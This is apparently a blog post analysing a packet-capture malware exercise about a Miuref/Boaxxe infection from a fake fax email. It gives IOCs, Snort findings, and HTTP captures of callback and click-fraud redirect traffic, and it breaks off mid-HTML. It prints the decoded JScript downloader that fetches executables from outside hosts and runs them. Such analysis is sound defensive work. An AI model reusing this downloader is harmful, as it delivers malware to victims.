{"id":258,"date":"2015-11-15T22:22:10","date_gmt":"2015-11-15T22:22:10","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=258"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-11-06-email-roulette","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=258","title":{"rendered":"Malware Exercise 2015-11-06 Email Roulette"},"content":{"rendered":"<p>So here is my write-up of the latest malware exercise from Brad. Needless to say, his description of the event that lead up to the infection is hilarious. Another great exercise to say the least. As usual, if you spot something off or something that I could improve on, drop me a comment below. <\/p>\n<p>Summary of the Investigation<br \/>\n==============================<\/p>\n<p>&#8211; Date and time of the activity.<br \/>\n&gt; 2015-11-06 @ 16:22<\/p>\n<p>&#8211; The infected computer&#8217;s IP address.<br \/>\n&gt; 10.3.66.103<\/p>\n<p>&#8211; The infected computer&#8217;s MAC address.<br \/>\n&gt; Dell 00:24:e8:2d:90:81<\/p>\n<p>&#8211; The infected computer&#8217;s host name.<br \/>\n&gt; STROUT-PC<\/p>\n<p>&#8211; Domains and IP addresses of any infection traffic with VT detection ratio.<br \/>\n&gt; 174.121.246.162 | kennedy.sitoserver.com | 3 \/ 66<br \/>\n&gt; uhwdkf5vov1twtehiru6mxs.ddns.net | 54.201.30.58 | 2 \/ 66<br \/>\n&gt; vyx74gpqlgpy.ddns.net | 54.148.180.204 | 2 \/ 66<br \/>\n&gt; ybijshibmr5xs0e.ddns.net | 217.160.165.207 | 2 \/ 66<br \/>\n&gt; 109.68.191.31 | 0 \/ 66<br \/>\n&gt; uhwdkf5vov1twtehiru6mxs.ddns.net | 54.201.30.58 | 2 \/ 66<br \/>\n&gt; ybijshibmr5xs0e.ddns.net | 217.160.165.207 | 2 \/ 66<br \/>\n&gt; uhwdkf5vov1twtehiru6mxs.ddns.net | 54.201.30.58 |<br \/>\n&gt; ippthost.com | 93.190.141.180 | 0 \/ 65<br \/>\n&gt; bqsearch.com | 93.190.142.64 | 0 \/ 65<br \/>\n&gt; 31.192.112.238 | 0<br \/>\n&gt; xml.admadk.com | 172.239.36.117 | 0 \/65<br \/>\n&gt; jfilter.popxml.com | 173.239.36.121 | 0 \/ 66<br \/>\n&gt; cpv.popxml.com | 173.239.36.121 | 0 \/ 66<br \/>\n&gt; filter.dsmedianet.com | 173.239.42.219 | 0 \/ 66<br \/>\n&gt; xml.dsmedianet.com | 173.239.42.219 | 0 \/ 66<br \/>\n&gt; 3Point5Oz.com | 192.241.179.166 | 0 \/ 66<br \/>\n&gt; 155.36.64.255:8080 | 0<br \/>\n&gt; 13.160.112.96:8080 | 0<br \/>\n&gt; 123.184.29.133:8080 | 0<br \/>\n&gt; 88.250.95.205:8080 | 0<br \/>\n&gt; 175.90.209.167:8080 | 0<br \/>\n&gt; 125.105.101.225:8080 | 0<br \/>\n&gt; 54.88.203.196:8080 | 0<br \/>\n&gt; 49.221.226.67:8080 | 0<br \/>\n&gt; 128.75.233.110:8080 | 0<br \/>\n&gt; 60.191.9.114:8080 | 0<br \/>\n&gt; 17.149.192.186:8080 | 0<br \/>\n&gt; 48.78.180.156:8080 | 0<br \/>\n&gt; 78.14.205.183:8080 | 0<br \/>\n&gt; 93.123.31.53:8080 | 49 \/ 54<br \/>\n&gt; 213.139.238.104:8080 | 0<br \/>\n&gt; 70.28.170.17:8080 | 0<br \/>\n&gt; 169.19.134.37:8080 | 0<br \/>\n&gt; 151.36.206.141:8080 | 0<br \/>\n&gt; 85.16.222.229:8080 | 0<br \/>\n&gt; 142.127.121.135:8080 | 0<\/p>\n<p>&#8211; Information about malware found on the infected host.<br \/>\n&gt; Based on what Snort (using the Emerging Threats ruleset in Security Onion) is telling me, this looks to be a Miuref\/Boaxxe infection as I am seeing some of the same characteristics that Brad documented in a write-up for <a href=\"http:\/\/isc.sans.edu\/forums\/diary\/Malicious+spam+continues+to+serve+zip+archives+of+javascript+files\/19973\/\" target=\"_blank\">SANS ISC<\/a>. <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-6.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-6.png\" alt=\"SO Snort events\" width=\"1402\" height=\"184\" class=\"aligncenter size-full wp-image-259\" \/><\/a><\/p>\n<p>&#8211; The root cause (what is the likely cause of the infection noted in the pcap).<br \/>\n&gt; The user executed the javascript file found in the email labeled &#8220;You have received a new fax, document 000497762.&#8221; The attachment is labeled a Word document but is clearly something else.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-4.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-4.png\" alt=\"Example of the email\" width=\"2558\" height=\"1122\" class=\"aligncenter size-full wp-image-260\" \/><\/a><\/p>\n<p>Notes about investigation<br \/>\n=========================<\/p>\n<p>I started by looking at the PCAP via the &#8220;Statistics \u2014&gt; Protocol Hierarchy&#8221; option to get an idea of what all is in the PCAP and what I may need to pay attention to. In this case I did not see anything that stood out to me or anything that was out-of-the ordinary. I then looked at &#8220;Statistics \u2014&gt; Conversations&#8221; to see if there were any non-standard ports used in the conversations. It is here that I saw two things jump out at me:<\/p>\n<p>\t&#8211; Most UDP traffic is to Google DNS (8.8.8.8)<br \/>\n\t&#8211; Most TCP traffic is over port 80\/443 with some over port 8080<\/p>\n<p>With that information in hand, I used the filter &#8220;http.request&#8221; in Wireshark to see what the HTTP traffic looks like. The first of the HTTP requests was for the site kennedy[.]siteoserver[.]com:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/counter\/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&amp;rnd=3090341 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: kennedy.sitoserver.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:22:42 GMT\r\n\tServer: Apache\r\n\tContent-Disposition: attachment; filename=a340de8dc.gif\r\n\tContent-Length: 323045\r\n\tKeep-Alive: timeout=5, max=100\r\n\tConnection: Keep-Alive\r\n\tContent-Type: image\/gif\r\n\r\n\tMZ......................@...............................................!..L.!This program cannot be run in DOS mode.\r\n\t<\/pre>\n<p>The hostname above matches what I saw in the JS file that was attached to the email mentioned above when I decoded it within Malzilla:<\/p>\n<pre class=\"brush: jscript; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tvar b = &quot;kennedy.sitoserver.com nzvincent.com abama.org&quot;.split(&quot; &quot;); var ws = WScript.CreateObject(&quot;WScript.Shell&quot;); var fn = ws.ExpandEnvironmentStrings(&quot;%TEMP%&quot;)+String.fromCharCode(92)+&quot;799755&quot;; var xo = WScript.CreateObject(&quot;MSXML2.XMLHTTP&quot;); var xa = WScript.CreateObject(&quot;ADODB.Stream&quot;); var ld = 0; for (var n=1; n&lt;=3; n++) { for (var i=ld; i&lt;b.length; i++) { var dn = 0; try { xo.open(&quot;GET&quot;,&quot;http:\/\/&quot;+b&#x5B;i]+&quot;\/counter\/?id=&quot;+str+&quot;&amp;rnd=309034&quot;+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size &gt; 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+&quot;.exe&quot;,2); try { ws.Run(fn+n+&quot;.exe&quot;,1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };\r\n\t<\/pre>\n<p>\t***As a side note, I did not see any of the other domains from this script within the PCAP.<\/p>\n<p>Funny thing about this one is that it drops three executables onto the victim&#8217;s system which is labeled as an &#8220;image\/gif&#8221; via Content-Type even though they are clearly not image files:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-1.png\" alt=\"Requests to site in Fiddler\" width=\"1313\" height=\"71\" class=\"aligncenter size-full wp-image-262\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/Image-2.png\" alt=\"Properties of the 3 files\" width=\"1141\" height=\"517\" class=\"aligncenter size-full wp-image-263\" \/><\/a><\/p>\n<p>After the 3 files are downloaded and executed, it looks as if only one (fax-exec3.exe) may have executed from the above script since it matches some of the connections from the Malwr results below. Most of the connections seem to return a 404 error page. I also did see it connect to some &#8220;normal&#8221; looking sites as well (ie: micorsoft.com\/google.com), but do not know why (I can only speculate to verify that the malware somehow ran correctly). <\/p>\n<p>The following examples are from the &#8220;successful&#8221; connections from the PCAP since there were a lot of 404 error pages found in the exercise:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/nxNmV7nwZvsv5vGSPZPJc7T%2fNrnx7I9DadY%2ftrb3B%2bc3MAJwfEcizQtE24ilRQzPORPaZTUKGdUe%2fLTCU0ks7soWoPN%2fcz5UEgdakrQhIawhyJedT3XEMl0iesK824veJQ%2fFMzOLL4x7s6E9j09yV0mx46Pjm6Iww85r3IwSDCxfh28ZrCzpv5TpCI4fgKus55VUDZAvVgvzoHIXrGRA2FiaYoG5PgXBY%2b2Lo82INkeY9C99DsyHS3YnYCnSfeNhdTfvRXCOS25mDJkINxdqirrcV3%2fZkd5o6aN%2fBzTpkhsjPRFFniE2spOROS40D9rH50wbEPHaJ3xzy8GpB11TQUqmFhMxyjXcECTlVyAxyZhSZktTA6PPaKSymQ9duZDWUeUas%2bxdQa8HMuToKjuoBzZ8hDV7xIQCf3AJ55McTk2lllqjrVLMi9cTqZ8jSt%2fHRTXhq7W8gkdQifyj6QE7AozDhyVXFC45z8GNxxZV4SIuSsXKK40YOgHcvEQNlCVasFwGZeG3quixE5z29zyyIxtdA0zOZJmNfn1pTlzfIw9PLE77rae6y4C0GKOZN16nIUx1IkBWCJm3aXzRMYyg4%2ftMQPxFu1r211TgGhZ%2bd0ZxmkRNcuOa2fr5TOgqmXdkaL3O%2f26B20a69a94FHyUVfFW9kD9VCW5h8wi5NmZaKoAse7szQahQ6kS4j0 HTTP\/1.1\r\n\tAccept: text\/html, application\/xhtml+xml, *\/*\r\n\tAccept-Language: en-US\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tAccept-Encoding: gzip, deflate\r\n\tHost: 109.68.191.31\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:22:55 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t300a\r\n\t...............X.\r\n\t<\/pre>\n<p>        ***From what it looks like above, this looks to be Miuref\/Boaxxe callback traffic.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/u1483507537\/LNPnBH7vV7cp6mECnO2OgY3zIK5+oWESpllVAJoU9Fa0pczz8LwWFGg0QcBGQsp\/enwYMa1ydn2TRMHTipGnUgo6zlAGvnmvkCy31mhQITy57sDtaBg3ahKNxBm70g%3D%3D?2 HTTP\/1.1\r\n\tAccept: *\/*\r\n\tAccept-Encoding: gzip, deflate\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko\r\n\tHost: ippthost.com\r\n\tConnection: Keep-Alive\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:24:18 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t14\r\n\t....................\r\n\t0\r\n\t<\/pre>\n<p>This connection was interesting since the infection chain was long before it hit a redirect:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:17 GMT\r\n\tContent-Type: text\/plain\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\r\n\t11c\r\n\tO6lX+Nf7nyfMYxwxE96Ik6P8dEleiQs5AxPd3\/tWiUjN2p6D5QLw5oCX2Ucfp+0uvuHr1DdCExvW2PUvGisYmSZctpeZwG9uvdC8w6fZUDXWg6+umREiAmi68LUdRcHzeNwCKKn\/QcUBB4dMdhg\/wFpn37S9GQ85GaaDOlW5i\/jbLoCd1MeYEFFJoY5ghPVBkc99xeEgBAtC\r\n\thttp:\/\/bqsearch.com\/r?q=STEM CELL SERUM&amp;subid=z5595&amp;link=QihzkITVEeWXotSuUsmBXQ\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/r?q=STEM%20CELL%20SERUM&amp;amp;subid=z5595&amp;amp;link=QihzkITVEeWXotSuUsmBXQ HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:41 GMT\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tLocation: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&amp;subid=z5595\r\n\r\n\t38\r\n\thttp:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&subid=z5595\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/search?q=STEM+CELL+SERUM&amp;subid=z5595 HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/clk2?d=D7JNXwfxuZRAGuEGmjSmoLYtsJ\/6alJRejxIqVTqTg2zEsKP516YdBYGuu3E\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:42 GMT\r\n\tContent-Type: text\/html\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tContent-Encoding: gzip\r\n\r\n\t1e7\r\n\t...........S]O.0.}..0.!JDI..&gt;..S...$*.JG.i...m.&amp;q.;....s.&gt;.&gt;@{.u|..=..qf.&lt;.3.D.G.K.EK.msIA(S....R.......K\r\n\t...0......Y.u..\\..xCg.........l.u&gt;.L.*Ao..O.\/W..^..f}z.m&quot;......)...@..9......~Z]a..%..;D%.(K.&gt;#I..uA..J......6.X...R....N.WAUV.%....)!d.......A.y$.#.&lt;bGo.:.\/...w......Ya...$6.V.M..&amp;.^.R.....&#x5B;....B....\r\n\t..$.n{..\r\n\t....8......4...Y]......&gt;P*........t.?&lt;.G.a0.wwi..0..6...&quot;.7..C...L...\r\n\tW.?.....(........-.V..J....h.\\.A.;_..E.?.;...&lt;v..b...~0|u........~..sfy........8z.=.....qc...@~..N...\r\n\t0\r\n\r\n\t-----\r\n\r\n\tGET \/click?q=STEM+CELL+SERUM&amp;subid=z5595&amp;link=QihzkITVEeWXotSuUsmBXQ HTTP\/1.1\r\n\tHost: bqsearch.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&amp;subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tServer: nginx\/1.6.2\r\n\tDate: Fri, 06 Nov 2015 22:25:42 GMT\r\n\tTransfer-Encoding: chunked\r\n\tConnection: keep-alive\r\n\tLocation: http:\/\/c.feed-xml.com\/7\/cvc0cccx8a3qaau9a9f1cecb7da2e5f9d877e6d8d2e321e608x\r\n\r\n\t4b\r\n\thttp:\/\/c.feed-xml.com\/7\/cvc0cccx8a3qaau9a9f1cecb7da2e5f9d877e6d8d2e321e608x\r\n\t0\r\n\t<\/pre>\n<p>Another POST to a remote server:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tPOST \/ HTTP\/1.1\r\n\tContent-Type: application\/x-www-form-urlencoded\r\n\tUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\n\tHost: 31.192.112.238\r\n\tContent-Length: 440\r\n\tCache-Control: no-cache\r\n\r\n\tdTwV2pQ7U9vBzGQ\/oPsumG51v1shwzh1NDorW48hWZ0b3dINfog5A5CMsW19aa8qevSmU1EWw2gpjMB1FeJDbgm\/j\/B6eOh9KUcwrUQBLSXATn3pj59iY+BjTZ4LZx5OMxNyHrpc563FuUL9pEg0BuIjyvRV7u37nM1RNy+Z5VOzdhB+mhL9P9KYfshhMyE+yRU6YvoYyCmyol52Zmyc0fkuMzo0oYb+4H+C5opR5hVA6zWJt6I\/MLMWASH\/5BnTUOhy\/I5ygPh2JniW+qz4YNiLo6RsDkGJ0jBK1Bav6im\/PSDMxJvJAPBPPRCJNgG+IkCGCYefGRyUda18qXsrxwTCjlPQBI7uUK32ZEUSLKnpiAO+PFxeKNKbl7gm00M7jHAt9yiIN\/r8NB97O4U6FaBSe4P7U32JGqbOl5EJeP2EWvxf4G9YEG+v\r\n\r\n        HTTP\/1.1 200 OK\r\n\tDate: Fri, 06 Nov 2015 22:25:39 GMT\r\n\tServer: Apache\r\n\tLast-Modified: Tue, 19 Nov 2013 02:04:48 GMT\r\n\tETag: &quot;3809a1-8-4eb7e16dd3cea&quot;\r\n\tAccept-Ranges: bytes\r\n\tContent-Length: 8\r\n\tVary: Accept-Encoding\r\n\tConnection: close\r\n\tContent-Type: text\/html\r\n\tX-Pad: avoid browser bug\r\n\tSet-Cookie: RNLBSERVERID=ded1217; path=\/\r\n\r\n\tded1217\r\n\t<\/pre>\n<p>Through another redirect:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/click?i=TKlToHigxx4_2 HTTP\/1.1\r\n\tHost: xml.admadk.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&amp;subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 302 Found\r\n\tLocation: http:\/\/jfilter.popxml.com\/filter?q=STEM+CELL+SERUM&amp;i=83k5qWC18S8_2&amp;t=224767242\r\n\tSet-Cookie: x552284792=1924035799;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 0\r\n\t<\/pre>\n<p>Now it looks like we may be getting somewhere:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\tGET \/filter?q=STEM+CELL+SERUM&amp;i=83k5qWC18S8_2&amp;t=224767242 HTTP\/1.1\r\n\tHost: jfilter.popxml.com\r\n\tConnection: keep-alive\r\n\tAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\r\n\tUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/40.0.2214.111 Safari\/537.36\r\n\tcontent-language: en\r\n\tReferer: http:\/\/bqsearch.com\/search?q=STEM+CELL+SERUM&amp;subid=z5595\r\n\tAccept-Encoding: gzip,deflate\r\n\tAccept-Language: en-us,en;q=0.8\r\n\r\n\tHTTP\/1.1 200 OK\r\n\tCache-Control: no-store\r\n\tPragma: no-cache\r\n\tAge: 0\r\n\tContent-Type: text\/html; charset=utf-8\r\n\tSet-Cookie: c-1104858939=1924035799;Path=\/\r\n\tConnection: keep-alive\r\n\tContent-Length: 4650\r\n\r\n\t&lt;!DOCTYPE HTML&gt;\r\n\t&lt;html&gt;\r\n\t&lt;head&gt;\r\n\t&lt;script type=&quot;text\/javascript&quot;&gt;\r\n\r\n\t(function(c,d){var b={K:&quot;c-1104858939=1924035799&quot;,J:&quot;b&quot;,a:0,h:function(a){var b=&#x5B;],c;for(c in a)b.push(c+&quot;=&quot;+encodeURIComponent(a&#x5B;c]));return b.join(&quot;&amp;&quot;).replace(\/%20\/g,&quot;+&quot;)},g:function(a){return null==a?null:a.width+&quot;x&quot;+a.height},I:function(a){return null==a?null:a.left+&quot;x&quot;+a.top},u:function(){var a=screen.width,b=screen.height;return a&amp;&amp;b?{width:a,height:b}:null},A:function(){var a=c.innerWidth||d.documentElement.offsetWidth||d.body.clientWidth,b=c.innerHeight||d.documentElement.offsetHeight||d.body.clientHeight;\r\n\treturn a&amp;&amp;b?{width:a,height:b}:null},w:function(){return&quot;undefined&quot;!=typeof c.screenLeft?{left:c.screenLeft,top:c.screenTop}:&quot;undefined&quot;!=typeof c.screenX?{left:c.screenX,top:c.screenY}:null},D:function(){b.c=&quot;jc&quot;;b.f=Math.floor(1E4*Math.random());var a=b.c+&quot;=&quot;+b.f;d.cookie=a;return 0&gt;d.cookie.indexOf(a)?0:1},B:function(){return 0&gt;d.cookie.indexOf(b.K)?0:1},G:function(){return c==c.parent?0:1},C:function(){b.a=1;b.submit();return!1},i:function(){if(&quot;undefined&quot;!=typeof navigator.plugins&amp;&amp;&quot;object&quot;==\r\n\ttypeof navigator.plugins&#x5B;&quot;Shockwave Flash&quot;]){var a=navigator.plugins&#x5B;&quot;Shockwave Flash&quot;].description;if(a&amp;&amp;(&quot;undefined&quot;==typeof navigator.mimeTypes||!navigator.mimeTypes&#x5B;&quot;application\/x-shockwave-flash&quot;]||navigator.mimeTypes&#x5B;&quot;application\/x-shockwave-flash&quot;].enabledPlugin)){var a=a.replace(\/^.*\\s+(\\S+\\s+\\S+$)\/,&quot;$1&quot;),b=a.replace(\/^(.*)\\..*$\/,&quot;$1&quot;),d=a.replace(\/^.*\\.(.*)\\s.*$\/,&quot;$1&quot;),a=\/&#x5B;a-zA-Z]\/.test(a)?a.replace(\/^.*&#x5B;a-zA-Z]+(.*)$\/,&quot;$1&quot;):0;return b+&quot;.&quot;+d+&quot;.&quot;+a}}if(&quot;undefined&quot;!=typeof c.ActiveXObject)try{if(b=\r\n\tnew ActiveXObject(&quot;ShockwaveFlash.ShockwaveFlash&quot;))if(a=b.GetVariable(&quot;$version&quot;))return a=a.split(&quot; &quot;)&#x5B;1].split(&quot;,&quot;),a&#x5B;0]+&quot;.&quot;+a&#x5B;1]+&quot;.&quot;+a&#x5B;2]}catch(e){}return null},m:function(){for(var a=0,b=navigator.mimeTypes.length;a&lt;b;++a)if(null!=(resutl=navigator.mimeTypes&#x5B;a].type.match(\/^application\\\/x-java-applet;jpi-version=(.*)$\/)))return resutl&#x5B;1];if(navigator.plugins&amp;&amp;navigator.plugins.length)for(a=0,b=navigator.plugins.length;a&lt;b;++a)if(null!=(resutl=navigator.plugins&#x5B;a].name.match(\/^Java.*&#x5B;\\b ]+(&#x5B;\\d ]+.+)$\/)))return resutl&#x5B;1];\r\n\treturn null},s:function(){var a=d.referrer;if(!a)return a;var b=a.indexOf(&quot;:\/\/&quot;);0&lt;=b&amp;&amp;(a=a.substring(b+3));b=a.indexOf(&quot;\/&quot;);0&lt;=b&amp;&amp;(a=a.substring(0,b));return a},l:function(){return d.location.host},b:function(){return&quot;undefined&quot;!=typeof c.orientation?&quot;o&quot;:&quot;ontouchstart&quot;in d.documentElement?&quot;t&quot;:0&lt;c.navigator.msMaxTouchPoints?&quot;p&quot;:0},F:function(){if(0!=b.b())return 0;var a=d.getElementById(&quot;sw&quot;),c=a.offsetWidth;a.style.display=&quot;none&quot;;a.style.top=&quot;100%&quot;;a.style.display=&quot;block&quot;;return 0==c-a.offsetWidth?\r\n\t1:0},v:function(){var a=navigator.userAgent;if(!a)return a;1024&lt;a.length&amp;&amp;(a=a.substring(0,1024));return a},o:function(){return{rv:b.J,ss:b.g(b.u()),ws:b.g(b.A()),wp:b.I(b.w()),ce:b.D(),ck:b.c,cv:b.f,cs:b.B(),fr:b.G(),hc:b.a,fl:b.i(),jv:b.m(),sc:c.screen.colorDepth,hr:history.length,rf:b.s(),lo:b.l(),mb:b.b(),hb:b.F(),pl:navigator.platform,ua:b.v()}},submit:function(){var a=d.forms&#x5B;0];a.j.value=b.h(b.o());a.submit()},H:function(){b.submit()}};c.hc=b.C;c.jsfload=b.H})(window,document);\r\n\r\n\t&lt;\/script&gt;\r\n\t&lt;noscript&gt;&lt;meta http-equiv=&quot;refresh&quot; content='1;url=http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j='&gt;&lt;\/noscript&gt;\r\n\t&lt;style type=&quot;text\/css&quot;&gt;\r\n\t::-webkit-scrollbar { -webkit-appearance:none !important; }\r\n\t&lt;\/style&gt;\r\n\t&lt;\/head&gt;\r\n\t&lt;body onload=&quot;window.jsfload();&quot;&gt;\r\n\t&lt;div id=&quot;sw&quot; style=&quot;position:absolute; left:0px; width:100%; z-index:1;&quot;&gt;&lt;a href=&quot;http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=&quot; onclick=&quot;return window.hc();&quot;&gt;HOME&lt;\/a&gt;&lt;\/div&gt;\r\n\t&lt;div id=&quot;main&quot; style=&quot;position:absolute; top:0px; left:0px; z-index:2; background-color:white; width:100%; height:100%; overflow:hidden; text-align:center; line-height:2;&quot;&gt;\r\n\t.&lt;form action=&quot;http:\/\/cpv.popxml.com\/click2&quot; method=&quot;get&quot;&gt;\r\n\t..&lt;a href=&quot;http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=&quot; onclick=&quot;return window.hc();&quot;&gt;&#8206;&#8206;&#8206;&#8206;&lt;\/a&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;i&quot; value=&quot;83k5qWC18S8_2&quot;&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;f&quot; value=&quot;&quot;&gt;\r\n\t..&lt;input type=&quot;hidden&quot; name=&quot;j&quot; id=&quot;j&quot;&gt;\r\n\t..&lt;noscript&gt;&lt;center&gt;&lt;a href=&quot;http:\/\/cpv.popxml.com\/click2?i=83k5qWC18S8_2&amp;f=&amp;j=&quot; style=&quot;color:white&quot; onclick=&quot;return window.hc();&quot;&gt; &lt;\/a&gt;&lt;input type=submit value='Click to proceed to your destination'&gt;&lt;\/center&gt;&lt;\/noscript&gt;\r\n\t..&lt;div style=&quot;width:20px; height:10px; overflow:hidden;&quot;&gt; &lt;a 